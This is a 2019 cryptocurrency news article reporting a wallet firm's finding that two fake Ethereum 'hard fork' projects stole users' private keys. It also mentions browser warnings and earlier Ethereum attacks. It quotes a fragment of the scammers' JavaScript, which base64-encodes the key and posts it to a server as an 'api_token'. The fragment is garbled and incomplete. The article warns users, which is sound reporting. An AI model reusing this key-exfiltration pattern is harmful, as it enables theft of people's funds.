Ethereum Hard Fork Scams Unmasked

January 11, 2019 | AtoZ Markets –The upcoming Hard Fork of Ethereum and Ethereum Classic provides a huge opportunity for fraudsters. Recently, the Guarda team released information about two alleged versions of the “hard fork.” According to them, both companies are trying to steal money from the Ethereum users.

What Do We Know About Guarda?

Guarda is an innovative company, focused on building an ecosystem of products based on the blockchain technology, officially registered as Guardarian OÜ in 2017 and based in EU. The company has the FIU license for a virtual currency and complies with all applicable laws and regulations in each jurisdiction in which it operates. Guarda team developed a cryptocurrency wallet which is used to store the blockchain-based digital assets. Guarda Wallet team has made a thorough research of both new currencies that are supposed to be forked from the Ethereum blockchain on the 11th and the 12th of January. As the company states the official wallets of Ethereum Nowa which claims to give up on ETH and Ethereum Classic Vision which states to fork out from ETC, are frauds. Guarda team states that both projects are trying to seize users’ private keys.

Scammers’s Strategy Was to Steal Private Keys

Guarda team contacted one of the news platforms explaining what strategy two aforementioned fraudulent projects use to lure the users and steal their cryptos. Users are promised that they will be able to fork out and get money for the proposed new networks. It is important to note that Guarda discovered that both of these alleged cryptographic projects collected private keys and transferred data back to their servers. When accessing the Ethereum Nowa website and clicking on the “Wallet” button, as Guarda explained, the users are redirected to the page of Ethereum Nowa wallet creation/importing user’s old wallet. As Guarda specialists stated, this is exactly where the trap lies. After putting their private key in the provided space, the personal data is sent away to Ethereum Nowa server – a way for the thieves to get users private information and gain access to their wallet.

Another identified scammer’s Ethereum Classic Vision website is now suspended. The analysis on the code performed by the Guarda team has shown that the piece of code provided on the web page actually sends user’s private key data on the Ethereum Classic Vision servers, masking it as an API token.Code scammer used to lure the private key from the customers:

$scope.$on(‘ChangeWallet’,function (){

const key=window.btoa



{method: ‘POST’,mode: ‘cors’,cache: ‘no-cache’,credentials: ‘same-origin’,headers: {‘Content-Type’: ‘application/json’},

redirect: ‘follow’,

referrer: ‘no-referrer’,

body: JSON.stringify({ api_token: key })});

Firefox and MetaMask announced identifying scammers as well. MetaMask which developed the browser plugin that allows anyone using the Chrome browser to access Ethereum dApps added Ethereum Classic Vision in their warning domain list. Firefox in its turn identified another cryptocurrency project Ethnowallet website as “deceptive.”

It was not the first case in Ethereum history when its misconfigured users lost their funds. Last years in summer the group of hackers was able to access applications via Ethereum software which has configured their interface to reveal a Remote Procedure Call (RPC) giving access to private keys, funds, and personal data. This month, crypto exchange confirmed that Ethereum Classic (ETC) blockchain experienced a 51% attack. The cryptocurrency users are recommended to stay aware and follow the latest news on cyber threats.

Think we missed something? Let us know in the comments section below

Share Your Opinion, Write a Comment